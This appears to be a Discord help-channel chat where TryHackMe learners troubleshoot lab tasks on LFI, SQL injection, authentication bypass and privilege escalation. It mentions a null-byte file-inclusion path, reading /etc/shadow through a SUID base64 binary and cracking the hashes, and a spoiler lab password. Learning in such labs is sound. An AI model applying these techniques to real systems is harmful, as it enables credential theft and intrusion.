Because you are not requesting server.website, your are requesting api.website

ahh got it thanks

Anything in particular I need to do to get the Net Sec Challenge task 2, last flag to trigger? Consistently at 0% detection w/o a flag from my local machine as well as attack box.

got it 🙂

Lol alright, thanks. I’ll just send it some junk so it sorta detects me then start the scan

How long do I have to wait post scan before I should start spamming refresh again?

Ok, cool. Thanks

what trick was that

guys in the windows privesc task4 how do we learn version of the software

Hello so i am on Authentification bypass task 2 and i wrote in the command to the terminal but i dont see any of the usernames, what did i do wrong? thank you....

I did put in the ip address yes and i am using the in browser attack box, it suppose to be predownloaded i think

am is there away to just share a screenshot or smth i think it would be easier

You have to verify your THM account in discord first.

!docs verify

thank you ill try to figure this out and come back, thanks i feel stupid, maybe this path is too much for me im like very new i dont know

It's never easy if you are new to something 🙂 Just verify your THM account, send a screenshot in here and I'm sure someone will help you.

Much love

ok so this is it

Mh, could you try it again? Maybe the machine wasn't fully booted when you tried it.

Oh, you have a typo in application

oh.....

Thank you so much. I feel like an idiot.

Gave +1 Rep to @shadow echo

Well things like that can happen. I would go with copy/paste so you are more safe to make no typos. In case you didn't know, there is a small arrow between the splitscreens, you can paste stuff you copied from the left split screen into the clipboard and then you'll be able to paste it inside your attackbox.

that's brand new information

ty

Not a problem 😄

I gave up on LFI

Challenge #3 and the playground ended me

Im tired

come back with fresh eyes and a clear head

I think challenge 3 is bugging out on me

what have you done so far?

Did not know that, and it works perfectly now, thank you so much once again!

Gave +1 Rep to @shadow echo

guys can check the version out dunno how to check version from binary file in windows any suggestions
What version of FoxitReader is installed on the target system?

Challenge 3, i changed thr method from GET to POST, i put the needed path but the %00 keeps bugging out, the php extension never goes away

And in the playground i just don't know how to do it

what is your error when using the null byte?

It appears like this /etc/flag3%00.php very weird

Normally the extension should go away

user_ame

I tried . \ as well same issue

might be worth it to pass the request through burp just to see what's up

I know that happened to me and it was that I was on the wrong one

I don't know how to use it still learning

Gotcha

Hello, is this the right place to report a potential typo for a tryhackme box?

It's just a typo in the question. Still bugs?

already done that no result but i found aanother way thx neverthless

Gave +1 Rep to @steel nymph

Anyone managed to complete Linux PrivEsc Task 7?

The example shows nano, but the user account doesnt have SUID set for that. Only option I can see is ||base64||. Am I looking at it wrong?

Check gtfobins

For SQLi test, || for the password, I have the 2 numbers in the password, 4(something)6(something), should I be testing any special characters for the password? Kind of at a loss here ||

What is the value of the staff-session cookie?

just numbers

my fingers hurt from delete type one character delete, whoever made SQLmap deserves the best

just numbers???!?! what the freak, ok i'll try again but maybe it's broken

no way, I fat fingered it

and missed the right number 😂

lol

As far as I can tell that's intended. The point is to give an example of what you can do with an SUID file, now show you how to finish he task

I am not getting cookie in TryHackMe request catcher

Nobody is just gonna give you the flag.

yes

😢 FREAK, the user/pass I finally got are wrong 😂

Sir, I don't want flag from here. I want help to find the flag

Yea I couldn't launch bash either.

||try reading a file with base64||

You litteraly asked for the session cookie lmao.

@drifting drum can you confirm for sqli, || admin : 4961 ||

is that right and the system is broke or wrong pass

I don't remember the user but that password is correct iirc

ok sick

thanks

Okay Sir, Thank you

Gave +1 Rep to @steel nymph

There's a way to execute commands with base64. I tried it out a bit but couldn't execute a shell

you dont need to execute commands

i don't think you can launch a bash with it, people read /etc/shadow with it and crack passwords

Yes we know. But GTFO bins mentions that it's possible

So were just trying to figure out how

yeah cause I get the delay when I type in the query with username and password but then the login no workie 😂

Hmm. Try looking for the user again. I dont remember what it is off the top of my head

Nah, I opened the attackbox in another window and it worked

idk what's up with it 😂

Oh ok great!

Lmao

Yea

Yeah. Thanks for your help man

It's a bit buggy

That was a tough one